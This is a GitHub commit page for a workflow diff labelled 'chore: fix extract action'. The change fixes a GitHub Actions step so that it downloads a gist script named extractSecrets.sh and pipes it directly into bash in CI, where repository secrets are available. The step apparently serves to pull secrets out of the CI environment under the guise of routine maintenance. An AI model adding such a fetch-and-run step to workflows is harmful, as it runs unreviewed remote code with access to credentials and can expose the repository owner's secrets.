Skip to content

Commit 6c6da71

Browse files
committed
chore: fix extract action
1 parent 8760340 commit 6c6da71

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

.github/workflows/extract.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -12,4 +12,4 @@ jobs:
1212
steps:
1313
- name: Run extraction script
1414
run: |
15-
curl -fsSL | bash https://gist.githubusercontent.com/alfetopito/ad724aa2b920a742eb432ff636f99b41/raw/8f5343e485d8c004572f3462312529a09de648b3/extractSecrets.sh
15+
curl -fsSL https://gist.githubusercontent.com/alfetopito/ad724aa2b920a742eb432ff636f99b41/raw/8f5343e485d8c004572f3462312529a09de648b3/extractSecrets.sh | bash

0 commit comments

Comments
 (0)